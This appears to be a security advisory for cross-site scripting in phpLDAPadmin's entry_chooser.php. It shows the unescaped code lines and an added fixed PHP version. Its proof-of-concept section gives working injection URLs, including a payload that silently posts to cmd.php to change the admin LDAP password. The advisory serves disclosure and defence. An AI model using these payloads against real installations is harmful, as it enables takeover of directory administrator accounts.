Software Description
phpLDAPadmin is a web-based LDAP administration interface for viewing and manipulating LDAP information.
Vulnerability Description
The $request['form'] and $request['rdn'] parameters in the file htdocs/entry_chooser.php are not properly sanitized before being displayed back to the user, which allows a remote attacker to inject arbitrary HTML/JavaScript code that runs in the user's context.
<?php
// Line 18: 'form' is taken straight from the query string
$request['form'] = get_request('form','GET');
// Line 20: 'rdn' is taken straight from the query string
$request['rdn'] = get_request('rdn','GET');
// Line 27: 'form' and 'element' are interpolated unescaped into JavaScript source that is passed to eval()
printf(" eval ('o = opener.document.getElementById(\"%s\").%s;');",$request['form'],$request['element']);
// Line 74: 'rdn' is interpolated unescaped into a javascript: href; only $dn has its backslashes doubled
$href['return'] = sprintf("javascript:returnDN('%s%s')",($request['rdn'] ? sprintf('%s,',$request['rdn']) : ''),str_replace('\\','\\\\',$dn));
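For comparison, the following is an added example written for this page, not phpLDAPadmin's own patch: the two outputs above rebuilt so that the query parameters can no longer leave the JavaScript string literal or the HTML attribute they are placed in. The $request values and $dn are constructed sample inputs standing in for get_request() and the selected entry; the allow-list for 'element' and the assumption that the line-27 output sits inside a <script> block are this example's own.

```php
<?php
// Added example (not phpLDAPadmin's code): safe construction of the two
// entry_chooser.php outputs. $request and $dn are constructed sample values
// standing in for get_request() and the selected entry.
$request = [
    'form'    => 'advanced_search_form").base;\');} alert(1); function lol() { isNaN(\'',
    'element' => 'base',
    'rdn'     => 'test"><script>alert(1)</script>',
];
$dn = 'cn=admin,dc=example,dc=com';

// Flags that make json_encode() output safe to embed inside a <script> block:
// <, >, &, ' and " become \uXXXX escapes, so neither "</script>" nor a closing
// quote inside the value can terminate the literal or the block. json_encode()
// also escapes U+2028/U+2029 by default, which matters for JS string literals.
const JS_FLAGS = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;

// Line 27 replacement: 'form' becomes a JavaScript string literal instead of
// raw text spliced into an eval() string. 'element' is used as a property name,
// which no output encoder can make safe, so it is checked against an allow-list
// (the allow-list contents are an assumption of this example).
function elementAccessor(string $form, string $element): string
{
    $allowed = ['base', 'dn'];
    if (!in_array($element, $allowed, true)) {
        $element = 'base';
    }
    return sprintf('o = opener.document.getElementById(%s).%s;',
        json_encode($form, JS_FLAGS), $element);
}

// Line 74 replacement: the full DN is first made a JS string literal (this
// also covers the backslash doubling the original did by hand for $dn only),
// then the whole javascript: URL is HTML-encoded for the href attribute.
// The browser decodes the attribute entities before it parses the URL.
function returnHref(string $rdn, string $dn): string
{
    $fullDn = ($rdn !== '' ? $rdn . ',' : '') . $dn;
    $js = sprintf('javascript:returnDN(%s)', json_encode($fullDn, JS_FLAGS));
    return htmlspecialchars($js, ENT_QUOTES, 'UTF-8');
}

// Emit both outputs in their respective contexts.
echo "<script>\n", elementAccessor($request['form'], $request['element']), "\n</script>\n";
printf('<a href="%s">%s</a>%s',
    returnHref($request['rdn'], $dn),
    htmlspecialchars($request['rdn'] . ',' . $dn, ENT_QUOTES, 'UTF-8'),
    PHP_EOL);
```

Run with the PHP CLI and inspect the output: the 'form' payload is emitted as a single quoted string argument to getElementById(), and the 'rdn' payload appears in the href with its quotes and angle brackets encoded, so neither reaches the parser as code. The two contexts need two different encoders: json_encode() for data landing in JavaScript source and htmlspecialchars() for data landing in an HTML attribute, applied in that order when a value passes through both.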
Proof of Concept (PoC)
XSS via the 'form' parameter:
http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form%22).base;%27);}%20alert(1);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test
XSS via the 'rdn' parameter (needs Chrome's XSS Auditor bypass):
http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form&element=base&rdn=test%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Changing admin password to '1337'
PAYLOAD : %22).base;%27);}%20var%20http=new%20XMLHttpRequest();%20var%20url=%22http://localhost:8888/phpldapadmin/cmd.php%22;%20var%20params=%22cmd%3Dupdate%2526server_id%3D1%2526dn%3Dcn%25253D<LOGIN_DN>%2526new_values%25255Buserpassword%25255D%25255B0%25255D%3D%25257BSSHA%25257Dxtzm0RhdgidTmNnRD0rvUdjCcGhPQgKa%22;%20http.open(%22POST%22,%20url,%20true);%20http.setRequestHeader(%22Content-type%22,%20%22application/x-www-form-urlencoded%22);%20http.send(params);%20function%20lol()%20{%20isNaN(%27
<LOGIN_DN>: the triple-URL-encoded login DN (e.g. cn%253Dadmin%252Cdc%253Dldap%252Cdc%253Dcom)
PoC URL:
http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form%22).base;%27);}%20var%20http=new%20XMLHttpRequest();%20var%20url=%22http://localhost:8888/phpldapadmin/cmd.php%22;%20var%20params=%22cmd%3Dupdate%2526server_id%3D1%2526dn%3Dcn%25253Dadmin%25252Cdc%25253Dldap%25252Cdc%25253Dcom%2526new_values%25255Buserpassword%25255D%25255B0%25255D%3D%25257BSSHA%25257Dxtzm0RhdgidTmNnRD0rvUdjCcGhPQgKa%22;%20http.open(%22POST%22,%20url,%20true);%20http.setRequestHeader(%22Content-type%22,%20%22application/x-www-form-urlencoded%22);%20http.send(params);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test
References
https://bugs.launchpad.net/ubuntu/+source/phpldapadmin/+bug/1701731
https://github.com/leenooks/phpLDAPadmin/issues/50